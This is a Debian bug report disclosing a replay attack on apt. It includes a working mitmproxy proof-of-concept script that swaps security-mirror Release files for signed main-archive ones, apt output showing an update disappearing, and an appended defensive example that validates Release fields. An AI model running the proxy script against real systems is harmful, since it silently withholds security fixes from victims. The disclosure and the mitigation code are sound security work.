Bug#863317: apt: susceptible to replay attacks
Package: apt
Version: 1.0.9.8.4
Tags: security
Nearly a decade ago, Valid-Until fields were added to Release files (bug
#499897). The primary motivation for this was to prevent a man-in-the-middle
adversary from serving an outdated copy of the security mirror.
Unfortunately, this protection is ineffective. All the attacker needs to do to
hide security updates is to replace all the files from
http://security.debian.org/dists/$DIST/updates/ with the ones from
http://deb.debian.org/debian/dists/$DIST/ .
I've attached a proof-of-concept mitmproxy script that implements this attack:
# apt-cache policy bitlbee
bitlbee:
  Installed: (none)
  Candidate: 3.2.2-2+deb8u1
  Version table:
     3.2.2-2+deb8u1 0
        500 http://security.debian.org/ jessie/updates/main i386 Packages
     3.2.2-2 0
        500 http://http.us.debian.org/debian/ jessie/main i386 Packages
# apt-get update -o Acquire::http::Proxy=http://127.0.0.1:8080
Ign http://http.us.debian.org jessie InRelease
Hit http://http.us.debian.org jessie-updates InRelease
Hit http://http.us.debian.org jessie Release.gpg
Ign http://security.debian.org jessie/updates InRelease
Get:1 http://http.us.debian.org jessie-updates/main i386 Packages/DiffIndex [7900 B]
Get:2 http://security.debian.org jessie/updates Release.gpg [2373 B]
Hit http://http.us.debian.org jessie Release
Hit http://http.us.debian.org jessie/main i386 Packages
Get:3 http://security.debian.org jessie/updates Release [148 kB]
Get:4 http://security.debian.org jessie/updates/main i386 Packages [6793 kB]
Fetched 6952 kB in 7s (978 kB/s)
Reading package lists... Done
# apt-cache policy bitlbee
bitlbee:
  Installed: (none)
  Candidate: 3.2.2-2
  Version table:
     3.2.2-2 0
        500 http://http.us.debian.org/debian/ jessie/main i386 Packages
        500 http://security.debian.org/ jessie/updates/main i386 Packages
-- System Information:
Debian Release: 8.8
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages apt depends on:
ii debian-archive-keyring 2014.3
ii gnupg 1.4.18-7+deb8u3
ii libapt-pkg4.12 1.0.9.8.4
ii libc6 2.19-18+deb8u9
ii libgcc1 1:4.9.2-10
ii libstdc++6 4.9.2-10
--
Jakub Wilk
# Usage: mitmproxy [options] -s no-security.d.o.py
try:
    import mitmproxy  # package name since mitmproxy 0.18 (older releases shipped libmproxy)
except ImportError:  # mitmproxy < 0.18: inline script hooks take a context argument
    NEW_API = False

    def request(ctx, flow):
        return _request(flow)
else:  # mitmproxy >= 0.18
    NEW_API = True

    def request(flow):
        return _request(flow)


def _request(flow):
    # Only plain-HTTP requests for the security mirror are rewritten.
    if flow.request.host == 'security.debian.org' and flow.request.port == 80:
        # Drop If-Modified-Since/If-None-Match so the upstream answers with a
        # full copy instead of a 304 for the client's cached security files.
        flow.request.anticache()
        # /dists/$DIST/updates/... -> /debian/dists/$DIST/...
        flow.request.path = '/debian' + flow.request.path.replace('/updates/', '/')
        flow.request.host = 'deb.debian.org'
        if NEW_API:
            flow.request.headers['Host'] = 'deb.debian.org'
        else:  # the old ODict header store expects a list of values
            flow.request.headers['Host'] = ['deb.debian.org']
        flow.request.scheme = 'http'
# vim:ts=4 sts=4 sw=4 et
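The swap works because the substituted Release file is genuinely signed and either carries a Valid-Until still in the future or none at all, so an expiry check alone has nothing to object to. The following is an added example, not part of the bug report and not apt's own code: it parses two constructed Release header stanzas (one modelled on security.debian.org jessie/updates, one on deb.debian.org jessie; real files also carry hash lists, omitted here) and shows that a Valid-Until-only check accepts the substituted file, while a check that also pins the Label and Codename the sources.list entry expects, and rejects a Date older than the last Release file seen, does not. The Label/Codename pin and the rollback check are assumptions made for illustration, not a description of what apt implements.

```python
"""Validate a fetched Release file against what a sources.list line expects.

Added example (not from the bug report or from apt): the stanzas below are
constructed, trimmed to the header fields this check reads, and the signature
check is assumed to have already passed for both, as it does in the attack.
"""
from datetime import datetime, timezone

# Constructed Release headers modelled on security.debian.org jessie/updates ...
SECURITY_RELEASE = """\
Origin: Debian
Label: Debian-Security
Suite: stable
Codename: jessie
Date: Sat, 27 May 2017 09:31:27 UTC
Valid-Until: Sat, 03 Jun 2017 09:31:27 UTC
"""

# ... and on deb.debian.org jessie, which the proxy substitutes for it.
# A Release file without Valid-Until never expires.
MAIN_RELEASE = """\
Origin: Debian
Label: Debian
Suite: stable
Codename: jessie
Date: Sat, 06 May 2017 11:52:33 UTC
"""

# Assumed pin for the security-mirror sources.list entry (illustrative only).
EXPECTED_SECURITY = {'Label': 'Debian-Security', 'Codename': 'jessie'}

DATE_FMT = '%a, %d %b %Y %H:%M:%S %Z'


def parse_release(text):
    """Return the 'Field: value' header lines of a Release file as a dict.

    Indented lines (the per-file hash lists) are skipped.
    """
    fields = {}
    for line in text.splitlines():
        if not line or line[0] in ' \t':
            continue
        key, _, value = line.partition(':')
        fields[key.strip()] = value.strip()
    return fields


def parse_date(value):
    """Parse a Release Date/Valid-Until timestamp (always UTC) into an aware datetime."""
    return datetime.strptime(value, DATE_FMT).replace(tzinfo=timezone.utc)


def valid_until_ok(fields, now):
    """The Valid-Until check on its own: no Valid-Until means no expiry."""
    valid_until = fields.get('Valid-Until')
    return valid_until is None or parse_date(valid_until) >= now


def release_ok(fields, expected, now, previous_date=None):
    """Expiry, plus identity pin, plus no rollback.  Returns (ok, reason)."""
    if not valid_until_ok(fields, now):
        return False, 'Release file is expired'
    for key, want in expected.items():
        got = fields.get(key)
        if got != want:
            return False, '%s is %r, expected %r' % (key, got, want)
    if previous_date is not None and parse_date(fields['Date']) < previous_date:
        return False, 'Date is older than the previously seen Release file'
    return True, 'ok'


def demo():
    """Run the checks against the substituted file as of 28 May 2017."""
    now = datetime(2017, 5, 28, tzinfo=timezone.utc)
    swapped = parse_release(MAIN_RELEASE)
    last_seen = parse_date(parse_release(SECURITY_RELEASE)['Date'])
    return {
        'valid_until_only': valid_until_ok(swapped, now),   # True: the swap passes
        'pinned': release_ok(swapped, EXPECTED_SECURITY, now),
        'rollback': release_ok(swapped, {'Codename': 'jessie'}, now, last_seen),
    }


if __name__ == '__main__':
    for name, result in demo().items():
        print(name, result)
```

Pinning Label rather than Origin is what distinguishes the two files here: both archives are Origin Debian, Suite stable, Codename jessie, so only Label and the hash lists differ between them.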